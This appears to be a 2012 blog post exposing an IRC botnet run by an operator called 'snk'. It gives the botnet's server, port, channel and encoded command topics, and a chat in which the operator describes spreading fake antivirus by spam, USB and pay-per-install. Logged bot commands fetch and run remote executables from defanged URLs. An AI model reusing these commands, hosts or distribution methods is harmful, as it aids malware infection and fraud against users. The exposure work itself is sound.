w4hw5wg3488h.net (snk Asper mod IRC botnet hosted in Karlsruhe, Germany by 1&1 Internet AG)

Resolved w4hw5wg3488h.net to

Server:  w4hw5wg3488h.net
Port:  5050
Channel:  #oh
Topic for #oh is: .d /100/97/111/124/120/46/47/39/99/103/96/69/126/115/101/62/113/111/115/62/100/124/57/61/39/57/60/23/40/61/47/33/12/63/52/35/42/41/17/103/8/85/63/104/127/118/39/98/107/73/77/
Topic for #oh set by s at Sat Dec 01 18:36:05 2012
Oper:  s!x@x

Talking with snk

<Userbased> hey
<s> sup
<Userbased> cool ircd mod
<s> yea
<Userbased> I like the link encryption as well
<Userbased> is this an asper mod?
<s> yea
<Userbased> is the spam built into the bot?
<Userbased> .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 204 f9555c
<Userbased> like that?
<s> no
<Userbased> oh
<Userbased> that would have been cool
<s> how u found that ip
<Userbased> how does being a zero access affiliate work? I've never seen it check into a stats url
<Userbased> threatexpert
<s> its good with US installs
<s> how u know it was spam
<s> have u checked it out?
<Userbased> That was an old one. I found the exe for that
<Userbased> ran it and saw it look up MX records
<s> :)
<Userbased> is it your mail or sending for others?
<s> mine
<Userbased> I hear email still gives a good spread
<s> im not using it for spread
<s> i spam fakeav
<Userbased> Why not spam the bot then load the fakeav?
<Userbased> You could load other crap as well
<s> on US ; GB etc av loaded, on EU ppc
<s> and other ppi
<s> php script
<Userbased> ah, so it's a link, not a zip
<Userbased> makes sense
<s> its zip
<Userbased> but the link gives the zip right, it's not attached
<s> with downloader
<s> it goes to php script
<s> and php script gives the right exe
<Userbased> yes
<Userbased> same as with skype
<s> on skype not need to spread zip
<s> are u the guy from trojanforge?
<Userbased> you on there?
<Userbased> lol
<s> yes
<Userbased> why ngr with skype but this for here?
<s> i never used ngrbot
<Userbased> hmm
<s> i dont have anything todo with their ngrbot and skypespread
<s> im working alone
<Userbased> ok
<Userbased> you are snk right?
<Userbased> or do I have you mixed up?
<s> yes im snk
<Userbased> I see a snk on that server. They just stealing your name?
<s> yes
<Userbased> lame
<Userbased> so how do you spread? just spam?
<s> usb
<s> whats their server with snk inside?
<Userbased> http://www.exposedbotnets.com/2012/10/venustimeinfopl-ngrbot-irc-botnet.html
<Userbased> get.my.front sets mode +q #load snk
<Userbased> Oct 28 14:53:28 <snk> !dl hxxp://hotfile.com/dl/177749006/d16b55a/23y9bf927gfh.html
<s> hehehe funny guys :)
<Userbased> yes
<Userbased> Oct 28 15:03:24 * Received a CTCP TIME from snk (to #load)
<Userbased> Oct 28 15:03:28 * Received a CTCP VERSION from snk (to #load)
<Userbased> Oct 28 15:15:57 * Disconnected (Remote host closed socket).
<s> u have bots too?
<Userbased> too lazy to keep up with crypts and servers
<s> ok
<s> i lost whole net some days ago cos of spamhaus
<s> need to start again
<Userbased> java!java@team PRIVMSG n[USA|XP]2144220 :.dl hxxp://031919c.netsolhost.com/4531545.exe    Nov 05 21:12:02 * test (java@team) has left #load
<Userbased> no backup dns?
<s> no
<s> do u know fubar?
<Userbased> ngrbot coder?
<s> yes
<s> its aspermod too
<Userbased> So I hear
<Userbased> Lots of stuff seems to use the asper base
<Userbased> how did you choose the domain, just pound on the keyboard>
<Userbased> ?
<s> yes
<Userbased> why do you always host with 1&1? are they cheap and slow to takedown or something?
<s> idk
<s> i just bought them

Hosting info: http://whois.domaintools.com/

Now he's spamming again:
Topic for #lol is: .s.on /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/115/103/52/117/91/109/ /100/97/111/124/49/59/47/127/124/127/58/64/127/122/102/114/119/114/112/112/114/116/101/34/124/103/104/10/ 327 y7f6x
Topic for #lol set by postman at Sat Dec 01 23:53:40 2012

His email lists are at http://www.chefbernards.com/ as 1.txt to 327.txt
